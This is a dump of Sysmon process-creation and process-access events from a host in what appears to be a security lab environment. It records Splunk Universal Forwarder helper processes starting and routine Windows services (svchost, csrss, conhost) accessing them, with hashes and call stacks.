154100x8000000000000000362691Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:33.007{8e433fbf-3785-6013-ce03-000000001100}5508C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8e433fbf-2a44-6013-e703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000362700Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:34.787{8e433fbf-2a46-6013-5700-000000001100}34164116C:\Windows\System32\svchost.exe{8e433fbf-2a45-6013-4c00-000000001100}3676C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rasmans.dll+3751b|c:\windows\system32\rasmans.dll+36fad|c:\windows\system32\rasmans.dll+10ed8|c:\windows\system32\rasmans.dll+33cd5|C:\Windows\System32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362717Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:40.694{8e433fbf-2a47-6013-6600-000000001100}53205376C:\Windows\system32\conhost.exe{8e433fbf-378c-6013-d003-000000001100}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362716Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:40.694{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362715Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:40.694{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362714Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:40.694{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362713Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:40.694{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362712Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:40.694{8e433fbf-2a44-6013-0600-000000001100}7561420C:\Windows\system32\csrss.exe{8e433fbf-378c-6013-d003-000000001100}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000362711Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:40.694{8e433fbf-2a45-6013-4f00-000000001100}37406536C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8e433fbf-378c-6013-d003-000000001100}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+20e72|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 154100x8000000000000000362710Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:40.695{8e433fbf-378c-6013-d003-000000001100}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8e433fbf-2a44-6013-e703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000362709Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:40.366{8e433fbf-378c-6013-cf03-000000001100}63329908C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362708Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:40.194{8e433fbf-2a47-6013-6600-000000001100}53205376C:\Windows\system32\conhost.exe{8e433fbf-378c-6013-cf03-000000001100}6332C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362707Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:40.194{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362706Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:40.194{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362705Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:40.194{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362704Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:40.194{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362703Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:40.194{8e433fbf-2a44-6013-0600-000000001100}7565040C:\Windows\system32\csrss.exe{8e433fbf-378c-6013-cf03-000000001100}6332C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000362702Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:40.194{8e433fbf-2a45-6013-4f00-000000001100}37406536C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8e433fbf-378c-6013-cf03-000000001100}6332C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+20e72|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 154100x8000000000000000362701Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:40.195{8e433fbf-378c-6013-cf03-000000001100}6332C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8e433fbf-2a44-6013-e703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000362718Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:44.897{8e433fbf-2a46-6013-5700-000000001100}34164116C:\Windows\System32\svchost.exe{8e433fbf-2a45-6013-4c00-000000001100}3676C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rasmans.dll+3751b|c:\windows\system32\rasmans.dll+36fad|c:\windows\system32\rasmans.dll+10ed8|c:\windows\system32\rasmans.dll+33cd5|C:\Windows\System32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1